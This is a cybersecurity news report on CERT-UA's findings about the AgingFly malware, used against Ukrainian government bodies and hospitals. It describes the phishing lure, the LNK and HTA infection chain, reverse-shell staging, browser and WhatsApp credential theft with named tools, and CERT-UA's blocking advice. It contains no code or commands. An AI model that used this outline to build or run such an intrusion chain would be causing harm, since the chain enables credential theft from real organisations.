A New Threat Emerges Against Ukrainian Infrastructure
Ukrainian cybersecurity officials have identified a previously unknown malware family, dubbed AgingFly, actively being used in cyberattacks targeting local government agencies, hospitals, and potentially representatives of the country's Defense Forces. Ukraine's Computer Emergency Response Team (CERT-UA) detected the campaign last month and has attributed it to a cyber threat cluster it tracks under the designation UAC-0247. The attacks are designed to harvest authentication data from Chromium-based web browsers and the Windows version of WhatsApp messenger.
How the Attack Begins: Phishing via Humanitarian Lures
According to CERT-UA's report published on April 15, 2026, the infection chain is initiated through a targeted phishing email. The message is crafted to appear as a legitimate offer of humanitarian aid, enticing recipients to click an embedded hyperlink. That link redirects victims either to a genuine website that had been previously compromised through a cross-site scripting (XSS) vulnerability, or to a fraudulent website generated with the help of an AI tool — a sign of increasingly sophisticated social engineering tactics.
Once the victim visits the site, they receive a compressed archive containing a shortcut file in LNK format. This file triggers a built-in HTA (HTML Application) handler, which then reaches out to a remote resource to fetch and execute an HTA file. To mask malicious activity, the HTA displays a decoy form to the victim while simultaneously creating a scheduled task in the background. That scheduled task downloads and runs an EXE payload, which proceeds to inject shellcode into a legitimate Windows process.
Multi-Stage Loader and Command Infrastructure
Following initial execution, the attackers deploy a two-stage loader. The second stage uses a custom executable format, and the final payload is both compressed and encrypted to resist analysis. CERT-UA notes that a TCP reverse shell — or an equivalent classified as RAVENSHELL — may serve as a stager at this point, establishing a TCP connection back to the attacker's command-and-control (C2) server.
Communication with the C2 server is encrypted using the XOR cipher, and commands are relayed to the victim machine via the Windows Command Prompt. Alongside the AgingFly payload, a PowerShell script dubbed SILENTLOOP is deployed to execute commands, update the malware's configuration, and dynamically retrieve the C2 server address from a Telegram channel or through fallback mechanisms if the primary channel is unavailable.
Credential Theft from Browsers and WhatsApp
After investigating approximately a dozen incidents, CERT-UA researchers determined that the attackers leverage the open-source security tool ChromElevator to decrypt and extract sensitive data — including saved passwords and cookies — from Chromium-based browsers such as Google Chrome, Microsoft Edge, and Brave, without requiring administrator-level privileges.
In addition to browser data, the threat actor attempts to extract sensitive information from WhatsApp for Windows by decrypting the application's databases using the open-source forensic tool ZAPiDESK. CERT-UA also observed the attacker conducting network reconnaissance and attempting lateral movement across compromised environments, making use of publicly available utilities including the RustScan port scanner and the tunneling tools Ligolo-ng and Chisel.
Inside AgingFly: Dynamic Compilation as an Evasion Strategy
AgingFly is written in C# and provides its operators with a wide range of capabilities, including:
- Remote control of infected systems
- Arbitrary command execution
- File exfiltration
- Screenshot capture
- Keylogging
- Arbitrary code execution
The malware communicates with its C2 server over WebSockets and encrypts that traffic using AES-CBC with a static key.
What makes AgingFly particularly notable — and technically unusual — is its approach to command handling. Rather than shipping with pre-built command handlers embedded in the binary, AgingFly receives those handlers from the C2 server as raw source code, which it then compiles dynamically at runtime on the infected host.
"A distinguishing feature of AGINGFLY compared to similar malware is the absence of built-in command handlers in its code. Instead, they are retrieved from the C2 server as source code and dynamically compiled at runtime," CERT-UA explains.
This design offers the attackers several tangible advantages: the initial payload is smaller and less suspicious, the malware's capabilities can be modified or expanded on demand without redeploying the implant, and static detection by antivirus and endpoint security tools becomes significantly more difficult since there is no stable signature to match against.
However, the approach also comes with trade-offs. It introduces additional operational complexity, creates a dependency on continuous C2 connectivity, leaves a larger footprint at runtime, and ultimately may increase the risk of behavioral detection by security monitoring systems.
Defensive Recommendations from CERT-UA
To disrupt the attack chain used in this campaign, CERT-UA recommends that organizations and individual users take the following steps:
- Block the execution of LNK shortcut files from untrusted sources
- Prevent the launch of HTA (HTML Application) files
- Restrict execution of JS (JavaScript) files outside of authorized contexts
These three file types are key components of the attack's initial delivery mechanism. Blocking them would effectively prevent UAC-0247 from establishing an initial foothold on targeted systems before the more sophisticated components of the chain can be activated. Organizations operating in sectors that have already been targeted — including local government and healthcare — are urged to implement these controls as a priority.
Source: BleepingComputer